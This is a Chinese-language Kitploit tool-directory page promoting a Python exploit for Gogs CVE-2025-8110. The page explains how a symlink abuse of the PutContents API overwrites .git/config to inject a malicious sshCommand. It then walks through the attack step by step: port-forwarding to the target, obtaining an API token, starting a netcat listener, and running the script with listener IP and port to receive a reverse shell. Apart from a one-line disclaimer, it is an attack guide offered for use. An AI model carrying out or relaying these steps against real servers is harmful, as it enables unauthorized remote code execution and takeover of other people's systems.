Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-8110-Gogs-RCE-Exploit — Gogs CVE-2025-8110 RCE 漏洞利用程序 | Kitploit
工具/GitHubGitHub/adityainnovates/cve-2025-8110-gogs-rce-exploit
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队远程访问工具
GitHubadityainnovates/cve-2025-8110-gogs-rce-exploit

CVE-2025-8110-Gogs-RCE-Exploit

Gogs CVE-2025-8110 RCE 漏洞利用程序

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
135个月前尚未审核
分享

Gogs CVE-2025-8110 RCE 漏洞利用

针对 Gogs 中 CVE-2025-8110 的自动 Python 漏洞利用脚本。该漏洞通过滥用 PutContents API(未能验证文件路径是否为符号链接)实现远程代码执行(RCE)。通过符号链接覆盖内部 .git/config 文件,我们可以注入恶意 sshCommand 来触发反向 Shell。

🛠️ 前提条件

确保已安装 Python 3 以及必要的依赖项:

root@kitploit:~
pip install requests rich beautifulsoup4

你还必须安装 git 并确保其在 $PATH 中可用,以便进行仓库克隆和提交。

⚙️ 设置与配置

1. 访问 Gogs WebUI

Gogs 可能绑定在 127.0.0.1:3001 上。使用端口转发在本地访问 WebUI:

root@kitploit:~
ssh -L 3001:127.0.0.1:3001 user@target-ip

2. 创建账户

端口转发后,访问 http://localhost:3001:

  • 创建一个新账户。
  • 记下你的 用户名 和 密码,以便脚本使用。

3. 生成 API 令牌

脚本使用 Gogs API 发送载荷:

  1. 登录 WebUI。
  2. 转到 设置 -> 应用程序。
  3. 在 管理个人访问令牌 下,生成一个新令牌。
  4. 立即复制该令牌。

🚀 执行

1. 启动 Netcat 监听器

在运行脚本之前启动监听器,因为一旦 API 更新被处理,shell 就会触发。

root@kitploit:~
nc -lvnp 5555

2. 运行漏洞利用脚本

将你的凭证和令牌作为参数传递:

root@kitploit:~
python3 exploit.py -u http://localhost:3001 -un <YOUR_USER> -pw <YOUR_PASS> -t <YOUR_TOKEN> -lh <YOUR_IP> -lp 5555

参数

标志描述
-uGogs 实例的基础 URL(例如 http://localhost:3001)。
-un你所创建账户的用户名。
-pw你所创建账户的密码。
-t在设置中生成的 API 令牌。
-lh你的监听器 IP 地址(LHOST)。
-lp你的监听器端口(LPORT)。

注意: 如果脚本在 "Overwriting .git/config" 后挂起或返回 Read timed out,请检查你的监听器。这通常表示反向 Shell 已成功连接并保持连接。


作者: TYehan

免责声明: 此工具仅用于教育目的和授权的安全审计。请负责任地使用。

下载工具